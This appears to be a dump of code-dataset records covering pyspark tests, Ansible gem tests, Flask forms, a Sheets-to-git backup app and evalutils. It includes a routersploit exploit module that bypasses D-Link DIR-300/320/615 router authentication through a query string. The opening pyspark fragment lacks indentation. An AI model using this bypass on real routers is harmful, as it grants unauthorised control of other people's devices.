pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf1.where(psdf2 > 100)
pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf1.where(psdf2 < -250)
def test_mask(self):
pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf1.mask(psdf2 < 100)
pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf1.mask(psdf2 > -250)
def test_align(self):
pdf1 = pd.DataFrame({"a": [1, 2, 3], "b": ["a", "b", "c"]}, index=[10, 20, 30])
pdf2 = pd.DataFrame({"a": [4, 5, 6], "c": ["d", "e", "f"]}, index=[10, 11, 12])
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf1.align(psdf2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf1.align(psdf2, axis=0)
def test_pow_and_rpow(self):
pser = pd.Series([1, 2, np.nan])
psser = ps.from_pandas(pser)
pser_other = pd.Series([np.nan, 2, 3])
psser_other = ps.from_pandas(pser_other)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser.pow(psser_other)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser ** psser_other
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser.rpow(psser_other)
def test_combine_first(self):
pdf1 = pd.DataFrame({"A": [None, 0], "B": [4, None]})
psdf1 = ps.from_pandas(pdf1)
self.assertRaises(TypeError, lambda: psdf1.combine_first(ps.Series([1, 2])))
pser1 = pd.Series({"falcon": 330.0, "eagle": 160.0})
pser2 = pd.Series({"falcon": 345.0, "eagle": 200.0, "duck": 30.0})
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser1.combine_first(psser2)
pdf1 = pd.DataFrame({"A": [None, 0], "B": [4, None]})
psdf1 = ps.from_pandas(pdf1)
pdf2 = pd.DataFrame({"C": [3, 3], "B": [1, 1]})
psdf2 = ps.from_pandas(pdf2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf1.combine_first(psdf2)
if __name__ == "__main__":
from pyspark.pandas.tests.test_ops_on_diff_frames import * # noqa: F401
try:
import xmlrunner # type: ignore[import]
testRunner = xmlrunner.XMLTestRunner(output="target/test-reports", verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
| true | true |
f7fa3ea0d3d0549f395e122654ded5814882e7f6 | 4,658 | py | Python | exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/packaging/language/test_gem.py | tr3ck3r/linklight | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | [
"MIT"
] | null | null | null | exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/packaging/language/test_gem.py | tr3ck3r/linklight | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | [
"MIT"
] | null | null | null | exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/packaging/language/test_gem.py | tr3ck3r/linklight | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | [
"MIT"
] | null | null | null | # Copyright (c) 2018 Antoine Catton
# MIT License (see licenses/MIT-license.txt or https://opensource.org/licenses/MIT)
import copy
import pytest
from ansible_collections.community.general.plugins.modules.packaging.language import gem
from ansible_collections.community.general.tests.unit.modules.utils import AnsibleExitJson, AnsibleFailJson, ModuleTestCase, set_module_args
def get_command(run_command):
"""Generate the command line string from the patched run_command"""
args = run_command.call_args[0]
command = args[0]
return ' '.join(command)
class TestGem(ModuleTestCase):
def setUp(self):
super(TestGem, self).setUp()
self.rubygems_path = ['/usr/bin/gem']
self.mocker.patch(
'ansible_collections.community.general.plugins.modules.packaging.language.gem.get_rubygems_path',
lambda module: copy.deepcopy(self.rubygems_path),
)
@pytest.fixture(autouse=True)
def _mocker(self, mocker):
self.mocker = mocker
def patch_installed_versions(self, versions):
"""Mocks the versions of the installed package"""
target = 'ansible_collections.community.general.plugins.modules.packaging.language.gem.get_installed_versions'
def new(module, remote=False):
return versions
return self.mocker.patch(target, new)
def patch_rubygems_version(self, version=None):
target = 'ansible_collections.community.general.plugins.modules.packaging.language.gem.get_rubygems_version'
def new(module):
return version
return self.mocker.patch(target, new)
def patch_run_command(self):
target = 'ansible.module_utils.basic.AnsibleModule.run_command'
return self.mocker.patch(target)
def test_fails_when_user_install_and_install_dir_are_combined(self):
set_module_args({
'name': 'dummy',
'user_install': True,
'install_dir': '/opt/dummy',
})
with pytest.raises(AnsibleFailJson) as exc:
gem.main()
result = exc.value.args[0]
assert result['failed']
assert result['msg'] == "install_dir requires user_install=false"
def test_passes_install_dir_to_gem(self):
# XXX: This test is extremely fragile, and makes assuptions about the module code, and how
# functions are run.
# If you start modifying the code of the module, you might need to modify what this
# test mocks. The only thing that matters is the assertion that this 'gem install' is
# invoked with '--install-dir'.
set_module_args({
'name': 'dummy',
'user_install': False,
'install_dir': '/opt/dummy',
})
self.patch_rubygems_version()
self.patch_installed_versions([])
run_command = self.patch_run_command()
with pytest.raises(AnsibleExitJson) as exc:
gem.main()
result = exc.value.args[0]
assert result['changed']
assert run_command.called
assert '--install-dir /opt/dummy' in get_command(run_command)
def test_passes_install_dir_and_gem_home_when_uninstall_gem(self):
# XXX: This test is also extremely fragile because of mocking.
# If this breaks, the only that matters is to check whether '--install-dir' is
# in the run command, and that GEM_HOME is passed to the command.
set_module_args({
'name': 'dummy',
'user_install': False,
'install_dir': '/opt/dummy',
'state': 'absent',
})
self.patch_rubygems_version()
self.patch_installed_versions(['1.0.0'])
run_command = self.patch_run_command()
with pytest.raises(AnsibleExitJson) as exc:
gem.main()
result = exc.value.args[0]
assert result['changed']
assert run_command.called
assert '--install-dir /opt/dummy' in get_command(run_command)
update_environ = run_command.call_args[1].get('environ_update', {})
assert update_environ.get('GEM_HOME') == '/opt/dummy'
def test_passes_add_force_option(self):
set_module_args({
'name': 'dummy',
'force': True,
})
self.patch_rubygems_version()
self.patch_installed_versions([])
run_command = self.patch_run_command()
with pytest.raises(AnsibleExitJson) as exc:
gem.main()
result = exc.value.args[0]
assert result['changed']
assert run_command.called
assert '--force' in get_command(run_command)
| 33.271429 | 140 | 0.647059 |
import copy
import pytest
from ansible_collections.community.general.plugins.modules.packaging.language import gem
from ansible_collections.community.general.tests.unit.modules.utils import AnsibleExitJson, AnsibleFailJson, ModuleTestCase, set_module_args
def get_command(run_command):
args = run_command.call_args[0]
command = args[0]
return ' '.join(command)
class TestGem(ModuleTestCase):
def setUp(self):
super(TestGem, self).setUp()
self.rubygems_path = ['/usr/bin/gem']
self.mocker.patch(
'ansible_collections.community.general.plugins.modules.packaging.language.gem.get_rubygems_path',
lambda module: copy.deepcopy(self.rubygems_path),
)
@pytest.fixture(autouse=True)
def _mocker(self, mocker):
self.mocker = mocker
def patch_installed_versions(self, versions):
target = 'ansible_collections.community.general.plugins.modules.packaging.language.gem.get_installed_versions'
def new(module, remote=False):
return versions
return self.mocker.patch(target, new)
def patch_rubygems_version(self, version=None):
target = 'ansible_collections.community.general.plugins.modules.packaging.language.gem.get_rubygems_version'
def new(module):
return version
return self.mocker.patch(target, new)
def patch_run_command(self):
target = 'ansible.module_utils.basic.AnsibleModule.run_command'
return self.mocker.patch(target)
def test_fails_when_user_install_and_install_dir_are_combined(self):
set_module_args({
'name': 'dummy',
'user_install': True,
'install_dir': '/opt/dummy',
})
with pytest.raises(AnsibleFailJson) as exc:
gem.main()
result = exc.value.args[0]
assert result['failed']
assert result['msg'] == "install_dir requires user_install=false"
def test_passes_install_dir_to_gem(self):
set_module_args({
'name': 'dummy',
'user_install': False,
'install_dir': '/opt/dummy',
})
self.patch_rubygems_version()
self.patch_installed_versions([])
run_command = self.patch_run_command()
with pytest.raises(AnsibleExitJson) as exc:
gem.main()
result = exc.value.args[0]
assert result['changed']
assert run_command.called
assert '--install-dir /opt/dummy' in get_command(run_command)
def test_passes_install_dir_and_gem_home_when_uninstall_gem(self):
set_module_args({
'name': 'dummy',
'user_install': False,
'install_dir': '/opt/dummy',
'state': 'absent',
})
self.patch_rubygems_version()
self.patch_installed_versions(['1.0.0'])
run_command = self.patch_run_command()
with pytest.raises(AnsibleExitJson) as exc:
gem.main()
result = exc.value.args[0]
assert result['changed']
assert run_command.called
assert '--install-dir /opt/dummy' in get_command(run_command)
update_environ = run_command.call_args[1].get('environ_update', {})
assert update_environ.get('GEM_HOME') == '/opt/dummy'
def test_passes_add_force_option(self):
set_module_args({
'name': 'dummy',
'force': True,
})
self.patch_rubygems_version()
self.patch_installed_versions([])
run_command = self.patch_run_command()
with pytest.raises(AnsibleExitJson) as exc:
gem.main()
result = exc.value.args[0]
assert result['changed']
assert run_command.called
assert '--force' in get_command(run_command)
| true | true |
f7fa3f1a45b3381ac2f4e41174846e979ed5f25d | 5,001 | py | Python | app/account/forms.py | hack4impact/women-veterans-rock | 7de5f5645819dbe67ba71a1f0b29f84a45e35789 | [
"MIT"
] | 16 | 2015-10-26T20:30:35.000Z | 2017-02-01T01:45:35.000Z | app/account/forms.py | hack4impact/women-veterans-rock | 7de5f5645819dbe67ba71a1f0b29f84a45e35789 | [
"MIT"
] | 34 | 2015-10-21T02:58:42.000Z | 2017-02-24T06:57:07.000Z | app/account/forms.py | hack4impact/women-veterans-rock | 7de5f5645819dbe67ba71a1f0b29f84a45e35789 | [
"MIT"
] | 1 | 2015-10-23T21:32:28.000Z | 2015-10-23T21:32:28.000Z | from flask import url_for
from flask.ext.wtf import Form
from wtforms.fields import (
StringField,
PasswordField,
BooleanField,
SubmitField,
TextAreaField,
DateField,
SelectMultipleField
)
from wtforms.fields.html5 import EmailField
from wtforms.validators import (
Length,
Email,
EqualTo,
URL,
InputRequired,
Optional,
)
from wtforms import ValidationError
from ..models import User, AffiliationTag
class LoginForm(Form):
email = EmailField('Email', validators=[
InputRequired(),
Length(1, 64),
Email()
])
password = PasswordField('Password', validators=[InputRequired()])
remember_me = BooleanField('Keep me logged in')
submit = SubmitField('Log in')
class RegistrationForm(Form):
first_name = StringField('First name', validators=[
InputRequired(),
Length(1, 64)
])
last_name = StringField('Last name', validators=[
InputRequired(),
Length(1, 64)
])
email = EmailField('Email', validators=[
InputRequired(),
Length(1, 64),
Email()
])
password = PasswordField('Password', validators=[
InputRequired(),
EqualTo('password2', 'Passwords must match')
])
password2 = PasswordField('Confirm password', validators=[InputRequired()])
zip_code = StringField('ZIP Code', validators=[
InputRequired(),
Length(5, 5)
])
submit = SubmitField('Register')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise ValidationError('Email already registered. (Did you mean to '
'<a href="{}">log in</a> instead?)'
.format(url_for('account.login')))
class RequestResetPasswordForm(Form):
email = EmailField('Email', validators=[
InputRequired(),
Length(1, 64),
Email()])
submit = SubmitField('Reset password')
# We don't validate the email address so we don't confirm to attackers
# that an account with the given email exists.
class ResetPasswordForm(Form):
email = EmailField('Email', validators=[
InputRequired(),
Length(1, 64),
Email()])
new_password = PasswordField('New password', validators=[
InputRequired(),
EqualTo('new_password2', 'Passwords must match.')
])
new_password2 = PasswordField('Confirm new password',
validators=[InputRequired()])
submit = SubmitField('Reset password')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first() is None:
raise ValidationError('Unknown email address.')
class CreatePasswordForm(Form):
password = PasswordField('Password', validators=[
InputRequired(),
EqualTo('password2', 'Passwords must match.')
])
password2 = PasswordField('Confirm new password',
validators=[InputRequired()])
submit = SubmitField('Set password')
class ChangePasswordForm(Form):
old_password = PasswordField('Old password', validators=[InputRequired()])
new_password = PasswordField('New password', validators=[
InputRequired(),
EqualTo('new_password2', 'Passwords must match.')
])
new_password2 = PasswordField('Confirm new password',
validators=[InputRequired()])
submit = SubmitField('Update password')
class ChangeEmailForm(Form):
email = EmailField('New email', validators=[
InputRequired(),
Length(1, 64),
Email()])
password = PasswordField('Password', validators=[InputRequired()])
submit = SubmitField('Update email')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise ValidationError('Email already registered.')
class EditProfileForm(Form):
first_name = StringField('First name', validators=[
InputRequired(),
Length(1, 64)
])
last_name = StringField('Last name', validators=[
InputRequired(),
Length(1, 64)
])
bio = TextAreaField('About Me')
birthday = DateField(
label='Birthday',
description="YYYY-MM-DD",
format="%Y-%m-%d", validators=[Optional()])
facebook_link = StringField(
'Facebook Profile',
description="https://",
validators=[URL(), Optional()]
)
linkedin_link = StringField(
'LinkedIn Profile',
description="https://",
validators=[URL(), Optional()]
)
affiliations = SelectMultipleField(
'Affiliations',
default=[]
)
submit = SubmitField('Update profile')
def __init__(self, *args):
super(EditProfileForm, self).__init__(*args)
self.affiliations.choices = (
[(str(affiliation.id), str(affiliation.name))
for affiliation in AffiliationTag.query.all()]
)
| 29.946108 | 79 | 0.618276 | from flask import url_for
from flask.ext.wtf import Form
from wtforms.fields import (
StringField,
PasswordField,
BooleanField,
SubmitField,
TextAreaField,
DateField,
SelectMultipleField
)
from wtforms.fields.html5 import EmailField
from wtforms.validators import (
Length,
Email,
EqualTo,
URL,
InputRequired,
Optional,
)
from wtforms import ValidationError
from ..models import User, AffiliationTag
class LoginForm(Form):
email = EmailField('Email', validators=[
InputRequired(),
Length(1, 64),
Email()
])
password = PasswordField('Password', validators=[InputRequired()])
remember_me = BooleanField('Keep me logged in')
submit = SubmitField('Log in')
class RegistrationForm(Form):
first_name = StringField('First name', validators=[
InputRequired(),
Length(1, 64)
])
last_name = StringField('Last name', validators=[
InputRequired(),
Length(1, 64)
])
email = EmailField('Email', validators=[
InputRequired(),
Length(1, 64),
Email()
])
password = PasswordField('Password', validators=[
InputRequired(),
EqualTo('password2', 'Passwords must match')
])
password2 = PasswordField('Confirm password', validators=[InputRequired()])
zip_code = StringField('ZIP Code', validators=[
InputRequired(),
Length(5, 5)
])
submit = SubmitField('Register')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise ValidationError('Email already registered. (Did you mean to '
'<a href="{}">log in</a> instead?)'
.format(url_for('account.login')))
class RequestResetPasswordForm(Form):
email = EmailField('Email', validators=[
InputRequired(),
Length(1, 64),
Email()])
submit = SubmitField('Reset password')
class ResetPasswordForm(Form):
email = EmailField('Email', validators=[
InputRequired(),
Length(1, 64),
Email()])
new_password = PasswordField('New password', validators=[
InputRequired(),
EqualTo('new_password2', 'Passwords must match.')
])
new_password2 = PasswordField('Confirm new password',
validators=[InputRequired()])
submit = SubmitField('Reset password')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first() is None:
raise ValidationError('Unknown email address.')
class CreatePasswordForm(Form):
password = PasswordField('Password', validators=[
InputRequired(),
EqualTo('password2', 'Passwords must match.')
])
password2 = PasswordField('Confirm new password',
validators=[InputRequired()])
submit = SubmitField('Set password')
class ChangePasswordForm(Form):
old_password = PasswordField('Old password', validators=[InputRequired()])
new_password = PasswordField('New password', validators=[
InputRequired(),
EqualTo('new_password2', 'Passwords must match.')
])
new_password2 = PasswordField('Confirm new password',
validators=[InputRequired()])
submit = SubmitField('Update password')
class ChangeEmailForm(Form):
email = EmailField('New email', validators=[
InputRequired(),
Length(1, 64),
Email()])
password = PasswordField('Password', validators=[InputRequired()])
submit = SubmitField('Update email')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise ValidationError('Email already registered.')
class EditProfileForm(Form):
first_name = StringField('First name', validators=[
InputRequired(),
Length(1, 64)
])
last_name = StringField('Last name', validators=[
InputRequired(),
Length(1, 64)
])
bio = TextAreaField('About Me')
birthday = DateField(
label='Birthday',
description="YYYY-MM-DD",
format="%Y-%m-%d", validators=[Optional()])
facebook_link = StringField(
'Facebook Profile',
description="https://",
validators=[URL(), Optional()]
)
linkedin_link = StringField(
'LinkedIn Profile',
description="https://",
validators=[URL(), Optional()]
)
affiliations = SelectMultipleField(
'Affiliations',
default=[]
)
submit = SubmitField('Update profile')
def __init__(self, *args):
super(EditProfileForm, self).__init__(*args)
self.affiliations.choices = (
[(str(affiliation.id), str(affiliation.name))
for affiliation in AffiliationTag.query.all()]
)
| true | true |
f7fa3f64974fb0bb7564275775f996229970cfe7 | 2,723 | py | Python | Router/routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | 46 | 2017-05-15T11:15:08.000Z | 2018-07-02T03:32:52.000Z | Router/routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | null | null | null | Router/routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | 24 | 2017-05-17T03:26:17.000Z | 2018-07-09T07:00:50.000Z | from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
http_request,
mute,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for D-Link DIR-300, DIR-320, DIR-615 Authentication Bypass vulnerability.
If the target is vulnerable link to bypass authentication will be provided"
"""
__info__ = {
'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.',
'authors': [
'Craig Heffner', # vulnerability discovery
'Karol Celin', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf',
],
'targets': [
'D-Link DIR-300',
'D-Link DIR-600',
'D-Link DIR-615 revD',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
print_success("Target is vulnerable")
print "\nYou need to add NO_NEED_AUTH=1&AUTH_GROUP=0 to query string for every action."
print "\nExamples:"
print "{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port)
print "{}:{}/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0\n".format(self.target, self.port)
else:
print_error("Target seems to be not vulnerable")
@mute
def check(self):
# check if it is valid target
url = sanitize_url("{}:{}/bsc_lan.php".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text:
return False # target is not vulnerable
# checking if authentication can be baypassed
url = sanitize_url("{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text:
return True # target is vulnerable
return False # target is not vulnerable
| 38.9 | 201 | 0.618068 | from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
http_request,
mute,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for D-Link DIR-300, DIR-320, DIR-615 Authentication Bypass vulnerability.
If the target is vulnerable link to bypass authentication will be provided"
"""
__info__ = {
'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.',
'authors': [
'Craig Heffner', # vulnerability discovery
'Karol Celin', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf',
],
'targets': [
'D-Link DIR-300',
'D-Link DIR-600',
'D-Link DIR-615 revD',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
print_success("Target is vulnerable")
print "\nYou need to add NO_NEED_AUTH=1&AUTH_GROUP=0 to query string for every action."
print "\nExamples:"
print "{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port)
print "{}:{}/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0\n".format(self.target, self.port)
else:
print_error("Target seems to be not vulnerable")
@mute
def check(self):
# check if it is valid target
url = sanitize_url("{}:{}/bsc_lan.php".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text:
return False # target is not vulnerable
# checking if authentication can be baypassed
url = sanitize_url("{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text:
return True # target is vulnerable
return False # target is not vulnerable
| false | true |
f7fa4004f6aaa9bd35ddd4d2a4a715e9cff1dad4 | 2,128 | py | Python | app.py | hackedu/sheets-backup | b9db1e1fecab8555baddd0e0505af25e99b13179 | [
"MIT"
] | 3 | 2017-03-08T15:24:04.000Z | 2021-09-26T14:00:10.000Z | app.py | hackclub/sheets-backup | b9db1e1fecab8555baddd0e0505af25e99b13179 | [
"MIT"
] | 1 | 2015-11-25T00:50:07.000Z | 2015-11-25T00:50:07.000Z | app.py | hackedu/sheets-backup | b9db1e1fecab8555baddd0e0505af25e99b13179 | [
"MIT"
] | null | null | null | import os
import sys
import requests
import re
from contextlib import contextmanager
from flask import Flask, request
from sh import cd, git, soffice
GIT_REMOTE = os.environ['GIT_REMOTE']
app = Flask(__name__)
repo = None
def init():
if os.path.exists('repo'):
if not os.path.isdir('repo/.git'):
sys.stderr.write('repo/ exists, but is not a git repo')
sys.exit(1)
else:
git.clone(GIT_REMOTE, 'repo')
# From http://stackoverflow.com/a/24176022/263998
@contextmanager
def cd(newdir):
prevdir = os.getcwd()
os.chdir(os.path.expanduser(newdir))
try:
yield
finally:
os.chdir(prevdir)
def export_as_ods(access_token, spreadsheet_id):
url = 'https://docs.google.com/feeds/download/spreadsheets/Export?key=' + spreadsheet_id + '&exportFormat=ods'
headers = {
'Authorization': 'Bearer ' + access_token
}
return requests.get(url, headers=headers).content
def convert_ods_to_fods(ods_path):
ods_filename = os.path.basename(ods_path)
dest_filename = re.sub('.ods$', '.fods', ods_filename)
dest_dir = os.path.dirname(ods_path) or '.'
soffice('--headless',
'--convert-to', 'fods',
'--outdir', dest_dir,
ods_path)
return os.path.join(dest_dir, dest_filename)
def write_bytes_to_file(filename, bytes):
f = open(filename, 'wb')
f.write(bytes)
f.close()
return filename
@app.route('/initiate_backup', methods=['POST'])
def backup():
access_token = request.form['access_token']
spreadsheet_id = request.form['spreadsheet_id']
with cd('repo/'):
git.pull()
ods = export_as_ods(access_token, spreadsheet_id)
ods_path = write_bytes_to_file('clubs.ods', ods)
fods_path = convert_ods_to_fods(ods_path)
os.remove(ods_path)
# Only commit and push if any files have changed.
if git('ls-files', '-m'):
git.add(fods_path)
git.commit('-m', 'Update spreadsheet.')
git.push()
return 'Consider it done!'
init()
if __name__ == '__main__':
app.run(debug=True)
| 25.95122 | 114 | 0.640977 | import os
import sys
import requests
import re
from contextlib import contextmanager
from flask import Flask, request
from sh import cd, git, soffice
GIT_REMOTE = os.environ['GIT_REMOTE']
app = Flask(__name__)
repo = None
def init():
if os.path.exists('repo'):
if not os.path.isdir('repo/.git'):
sys.stderr.write('repo/ exists, but is not a git repo')
sys.exit(1)
else:
git.clone(GIT_REMOTE, 'repo')
@contextmanager
def cd(newdir):
prevdir = os.getcwd()
os.chdir(os.path.expanduser(newdir))
try:
yield
finally:
os.chdir(prevdir)
def export_as_ods(access_token, spreadsheet_id):
url = 'https://docs.google.com/feeds/download/spreadsheets/Export?key=' + spreadsheet_id + '&exportFormat=ods'
headers = {
'Authorization': 'Bearer ' + access_token
}
return requests.get(url, headers=headers).content
def convert_ods_to_fods(ods_path):
ods_filename = os.path.basename(ods_path)
dest_filename = re.sub('.ods$', '.fods', ods_filename)
dest_dir = os.path.dirname(ods_path) or '.'
soffice('--headless',
'--convert-to', 'fods',
'--outdir', dest_dir,
ods_path)
return os.path.join(dest_dir, dest_filename)
def write_bytes_to_file(filename, bytes):
f = open(filename, 'wb')
f.write(bytes)
f.close()
return filename
@app.route('/initiate_backup', methods=['POST'])
def backup():
access_token = request.form['access_token']
spreadsheet_id = request.form['spreadsheet_id']
with cd('repo/'):
git.pull()
ods = export_as_ods(access_token, spreadsheet_id)
ods_path = write_bytes_to_file('clubs.ods', ods)
fods_path = convert_ods_to_fods(ods_path)
os.remove(ods_path)
if git('ls-files', '-m'):
git.add(fods_path)
git.commit('-m', 'Update spreadsheet.')
git.push()
return 'Consider it done!'
init()
if __name__ == '__main__':
app.run(debug=True)
| true | true |
f7fa40ab65005e934dab750f97e8216b91b792b1 | 23,200 | py | Python | evalutils/evalutils.py | GabyRumc/evalutils | d77c80d6420980a886302237ca321d09478a3db2 | [
"MIT"
] | 17 | 2018-10-31T18:46:21.000Z | 2022-01-27T05:07:56.000Z | evalutils/evalutils.py | GabyRumc/evalutils | d77c80d6420980a886302237ca321d09478a3db2 | [
"MIT"
] | 117 | 2018-03-29T08:39:22.000Z | 2022-03-30T07:47:15.000Z | evalutils/evalutils.py | GabyRumc/evalutils | d77c80d6420980a886302237ca321d09478a3db2 | [
"MIT"
] | 8 | 2018-07-23T13:40:15.000Z | 2022-03-31T13:28:52.000Z | import json
import logging
from abc import ABC, abstractmethod
from os import PathLike
from pathlib import Path
from typing import (
Any,
Callable,
Dict,
Iterable,
List,
Optional,
Pattern,
Set,
Tuple,
Union,
)
from warnings import warn
import SimpleITK
from pandas import DataFrame, Series, concat, merge
from .exceptions import ConfigurationError, FileLoaderError, ValidationError
from .io import (
CSVLoader,
FileLoader,
ImageLoader,
SimpleITKLoader,
first_int_in_filename_key,
)
from .scorers import score_detection
from .validators import DataFrameValidator, UniqueImagesValidator
logger = logging.getLogger(__name__)
DEFAULT_INPUT_PATH = Path("/input/")
DEFAULT_ALGORITHM_OUTPUT_IMAGES_PATH = Path("/output/images/")
DEFAULT_ALGORITHM_OUTPUT_FILE_PATH = Path("/output/results.json")
DEFAULT_GROUND_TRUTH_PATH = Path("/opt/evaluation/ground-truth/")
DEFAULT_EVALUATION_OUTPUT_FILE_PATH = Path("/output/metrics.json")
class Algorithm(ABC):
def __init__(
self,
*,
index_key: str = "input_image",
file_loaders: Optional[Dict[str, FileLoader]] = None,
file_filters: Optional[Dict[str, Optional[Pattern[str]]]] = None,
input_path: Path = DEFAULT_INPUT_PATH,
output_path: Path = DEFAULT_ALGORITHM_OUTPUT_IMAGES_PATH,
file_sorter_key: Optional[Callable] = None,
validators: Optional[Dict[str, Tuple[DataFrameValidator, ...]]] = None,
output_file: PathLike = DEFAULT_ALGORITHM_OUTPUT_FILE_PATH,
):
"""
The base class for all algorithms. Sets the environment and controls
the flow of the processing once `process` is called.
Parameters
----------
index_key
Fileloader key which must be used for the index.
Default: `input_image`
file_loaders
The loaders that will be used to get all files.
Default: `evalutils.io.SimpleITKLoader` for `input_image`
file_filters
Regular expressions for filtering certain FileLoaders.
Default: no filtering.
input_path
The path in the container where the ground truth will be loaded
from. Default: `/input`
output_path
The path in the container where the output images will be written.
Default: `/output/images`
file_sorter_key
A function that determines how files in the input_path are sorted.
Default: `None` (alphanumerical)
validators
A dictionary containing the validators that will be used on the
loaded data per file_loader key. Default:
`evalutils.validators.UniqueImagesValidator` for `input_image`
output_file
The path to the location where the results will be written.
Default: `/output/results.json`
"""
self._index_key = index_key
self._input_path = input_path
self._output_path = output_path
self._file_sorter_key = file_sorter_key
self._output_file = output_file
self._ground_truth_cases = DataFrame()
self._predictions_cases = DataFrame()
self._cases: Dict[str, DataFrame] = {}
self._case_results: List[Dict] = []
self._validators: Dict[str, Tuple[DataFrameValidator, ...]] = (
dict(input_image=(UniqueImagesValidator(),))
if validators is None
else validators
)
self._file_loaders: Dict[str, FileLoader] = (
dict(input_image=SimpleITKLoader())
if file_loaders is None
else file_loaders
)
self._file_filters: Dict[str, Optional[Pattern[str]]] = (
dict(input_image=None) if file_filters is None else file_filters
)
super().__init__()
def load(self):
for key, file_loader in self._file_loaders.items():
fltr = (
self._file_filters[key] if key in self._file_filters else None
)
self._cases[key] = self._load_cases(
folder=self._input_path,
file_loader=file_loader,
file_filter=fltr,
)
def _load_cases(
self,
*,
folder: Path,
file_loader: ImageLoader,
file_filter: Pattern[str] = None,
